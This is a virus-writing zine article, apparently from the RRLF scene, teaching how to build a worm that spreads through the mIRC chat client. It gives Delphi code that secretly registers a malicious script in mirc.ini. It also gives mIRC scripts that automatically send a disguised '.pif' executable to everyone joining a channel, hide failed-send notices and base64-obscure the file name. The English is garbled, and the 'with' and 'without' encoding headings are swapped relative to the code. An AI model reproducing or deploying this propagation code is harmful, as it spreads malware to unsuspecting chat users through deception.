RRLF ZINE ISSUE SEVEN

Virus Infecting The mIRC - by Hutley
by Hutley
+----------------------------------------------------------------------------+
|                                                                            |
|                             VIRUS INFECTING THE MIRC                       |
|                                                                            |
+----------------------------------------------------------------------------+

INTRODUCTION
------------

 The mIRC (messenger Internet Relay Chat) is a program made by Khaled Mardam-
Bey. It´s the most popular program to have access the net of IRC.
 Amongst other things as its easiness of use, the mIRC in it allows them that
they are created "scripts" to automatize the execution of some tasks.
 Another strong point in this excellent program it is the possibility of if 
sending any type of archive, not only for others mIRCs, but for all the other 
customers of IRC. ex. pIRCh, xIRCon, xChat, ect.
 Soon, with as many easinesses and functions, it is not of if admiring the 
existence of virus that infecting this program.
 We have everything in hands, the creation of scripts and the sending of archive.
 In this simple text, i will show as to infect the mIRC creating one script for
the direct sending of the archive. 
 Codes in delphi will be presented of as virus will go to make everything this.  
E also will be shown some examples of scripts 

Old mIRCs
---------

 Old to add one script mirc, it was enough to create an archive with the 
commands. This archive must have the name script.ini and was alone to place 
it in the same folder where mirc was installed. Therefore in the next 
inicialization of tje mirc the script would go to be read automatically, 
it was not necessary to enter with any type of command.

New mIRCs and Scripts
---------------------
 
 For mircs new the thing is not so simple thus. When if script wants to add
one is necessary to type the command "/load -rs nome.mrc". Typed command 
mirc will go to act of the following form:
1 - Read the file mirc.ini ans search the section rfiles.
2 - When found this section, read the last entrance; ex: n2=oi.mrc
3 - It adds to a new entrance inserting new script. In the case of the 
previous example, the new script (novo.mrc) will be in next line with the one
in this way: n3=novo.mrc.
 Basically this is everything that our "program" will have to make. Below a 
stretch of routine in delphi is followed that it makes this procedure all.

. . .
  MircIni := TIniFile.Create(mIRCDir + 'mirc.ini');
// It creates an object INI and load the mirc.ini

  StrMirc := TStringList.Create;
// A StringList with the name of StrMirc creates

  MircIni.ReadSection('rfiles', StrMirc);
// Reads the section rfiles and put the values in the stringlist

  MircIni.WriteString('rfiles', 'n' + IntToStr(StrMirc.Count), 'novo.mrc');
// Write inside of mirc.ini in section rfiles the new entrance with the name novo.mrc

  MircIni.Free;
// It finishes the object liberating it of the memory
. . .

 The part hard already is made. But before this it will be necessary to create the
archive that will be script. This archive will be the responsible one to make the 
sending of virus for that they will be in mirc.
 I will show the basic one of one script. The two will be in truth two scripts are
equal in its actions, but what it will go to differentiate one of another one will 
be the present criptografy inside of the code, that mirc will be decoded only when
it will be to read.
 Let´s go:

1º Script - With Criptography
-----------------------------

on 1:JOIN:#:{
 if ( $nick == $me ) { halt } | .dcc send $nick $mircdir $+ porn_in_msn.txt.pif
}
; It verifies if nick is equal to the one of victim, will be does not send for same itself

on 1:SENDFAIL:*:{ halt }
; It does not leave to appear acknowledgment of sending imperfections

=================================================================================

2º Script - Without Criptography
--------------------------------

on 1:JOIN:#:{
 if ( $nick == $me ) { halt } | .dcc send $nick $mircdir $+ $decode(cG9ybl9pbl9tc24udHh0LnBpZg==,m)
}

on 1:SENDFAIL:*:{ halt }

=================================================================================

Conclusion
----------
 As I said previously, these scripts and the example in delphi are basic. They are 
only for demonstrating that it is possible to make the thing and as to make it in 
basic way.
 You are enough to develop these techniques and the sky will be the limit.
 Ah, already it went forgetting me. To arrive itself at these codes in mirc, you 
are enough to use the command //echo -a $encode(text to encode,m). Mirc goes in 
the status of its and you it will see the text already codified, it has more 
information on codifications in mirc in its proper archive of help (mirc.hlp).

Good, this is everything.

+===============================================================================+
|             - Suggestions: hutleyvx@gmail.com <> www.hutley.cjb.net           |
+===============================================================================+